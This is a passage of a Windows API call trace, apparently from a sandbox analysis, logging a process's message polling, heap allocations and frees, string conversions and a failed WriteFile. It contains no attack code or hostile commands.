[0155.115] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.115] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.115] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.115] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.115] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.115] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.115] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.115] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.115] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.115] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.115] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.115] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.115] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.115] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.115] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.115] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.115] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.115] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.115] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.115] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.115] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.115] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.115] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.116] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.116] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.116] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.116] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.116] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.116] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.116] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a48 [0155.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e17d0 [0155.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="00000000000000000000010000000000\r\n", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0155.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x23) returned 0x8dc138 [0155.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="00000000000000000000010000000000\r\n", cchWideChar=35, lpMultiByteStr=0x8dc138, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="00000000000000000000010000000000\r\n", lpUsedDefaultChar=0x0) returned 35 [0155.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a48 | out: hHeap=0x8a0000) returned 1 [0155.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf2d8 [0155.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc138 | out: hHeap=0x8a0000) returned 1 [0155.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1000) returned 0x8e4188 [0155.116] GetLastError () returned 0x2 [0155.116] SetLastError (dwErrCode=0x2) [0155.116] GetLastError () returned 0x2 [0155.116] SetLastError (dwErrCode=0x2) [0155.117] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x8e4188, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x87dfe0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x87dfe0, lpOverlapped=0x0) returned 0 [0155.117] GetLastError () returned 0x6 [0155.117] GetLastError () returned 0x6 [0155.117] SetLastError (dwErrCode=0x6) [0155.117] GetLastError () returned 0x6 [0155.117] SetLastError (dwErrCode=0x6) [0155.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf2d8 | out: hHeap=0x8a0000) returned 1 [0155.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17d0 | out: hHeap=0x8a0000) returned 1 [0155.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2778 | out: hHeap=0x8a0000) returned 1 [0155.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1880 | out: hHeap=0x8a0000) returned 1 [0155.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d60 | out: hHeap=0x8a0000) returned 1 [0155.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a78 | out: hHeap=0x8a0000) returned 1 [0155.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ddf48 | out: hHeap=0x8a0000) returned 1 [0155.117] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1880 [0155.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17d0 [0155.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d280 [0155.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d280 | out: hHeap=0x8a0000) returned 1 [0155.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17d0 | out: hHeap=0x8a0000) returned 1 [0155.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1880 | out: hHeap=0x8a0000) returned 1 [0155.117] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1880 [0155.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1880 | out: hHeap=0x8a0000) returned 1 [0155.117] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1880 [0155.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ddf48 [0155.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a78 [0155.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17d0 [0155.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17d0 | out: hHeap=0x8a0000) returned 1 [0155.118] QueryPerformanceCounter (in: lpPerformanceCount=0x87f940 | out: lpPerformanceCount=0x87f940*=8561338375) returned 1 [0155.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a78 | out: hHeap=0x8a0000) returned 1 [0155.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ddf48 | out: hHeap=0x8a0000) returned 1 [0155.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1880 | out: hHeap=0x8a0000) returned 1 [0155.118] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ddf48 [0155.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a78 [0155.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1880 [0155.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e17d0 [0155.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de088 [0155.118] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0155.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de088 | out: hHeap=0x8a0000) returned 1 [0155.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17d0 | out: hHeap=0x8a0000) returned 1 [0155.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de088 [0155.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e17d0 [0155.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ddf70 [0155.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9d60 [0155.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17c0 [0155.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17c0 | out: hHeap=0x8a0000) returned 1 [0155.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a48 [0155.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de100 [0155.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0155.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e17c0 [0155.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b80 [0155.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db060 [0155.118] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de128 [0155.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0155.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1830 [0155.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0155.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de178 [0155.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c88 [0155.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1820 [0155.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9d30 [0155.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9d48 [0155.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1850 [0155.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d48 | out: hHeap=0x8a0000) returned 1 [0155.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9d48 [0155.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1850 | out: hHeap=0x8a0000) returned 1 [0155.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de150 [0155.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba678 [0155.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1850 [0155.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba690 [0155.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0155.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de0d8 [0155.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba630 [0155.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1860 [0155.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba648 [0155.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5d0 [0155.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de0b0 [0155.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5e8 [0155.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a80 [0155.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba600 [0155.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba588 [0155.119] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.119] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a70 [0155.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0155.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0155.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a70 [0155.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0155.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a60 [0155.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a50 [0155.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a50 | out: hHeap=0x8a0000) returned 1 [0155.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0155.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0155.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x91d568 [0155.120] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a70 [0155.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0155.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a50 [0155.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a50 | out: hHeap=0x8a0000) returned 1 [0155.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5a0 [0155.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a50 [0155.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a50 | out: hHeap=0x8a0000) returned 1 [0155.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5b8 [0155.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a50 [0155.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a50 | out: hHeap=0x8a0000) returned 1 [0155.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a50 [0155.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a40 [0155.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a30 [0155.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a50 | out: hHeap=0x8a0000) returned 1 [0155.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0155.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5a0 | out: hHeap=0x8a0000) returned 1 [0155.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5b8 | out: hHeap=0x8a0000) returned 1 [0155.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0155.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a70 [0155.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a60 [0155.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0155.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a40 | out: hHeap=0x8a0000) returned 1 [0155.121] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a40 [0155.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a40 | out: hHeap=0x8a0000) returned 1 [0155.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5d0 | out: hHeap=0x8a0000) returned 1 [0155.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a40 [0155.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a40 | out: hHeap=0x8a0000) returned 1 [0155.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x91d5a8 [0155.121] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a40 [0155.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5d0 [0155.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0155.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a50 [0155.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a20 [0155.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0155.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0155.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0155.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0155.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a50 | out: hHeap=0x8a0000) returned 1 [0155.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5d0 | out: hHeap=0x8a0000) returned 1 [0155.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a40 | out: hHeap=0x8a0000) returned 1 [0155.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5d0 [0155.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a40 [0155.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a50 [0155.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5b8 [0155.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5d0 | out: hHeap=0x8a0000) returned 1 [0155.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a40 | out: hHeap=0x8a0000) returned 1 [0155.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.122] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a40 [0155.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0155.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0155.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a10 [0155.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0155.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5d0 [0155.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0155.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0155.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a10 | out: hHeap=0x8a0000) returned 1 [0155.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0155.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 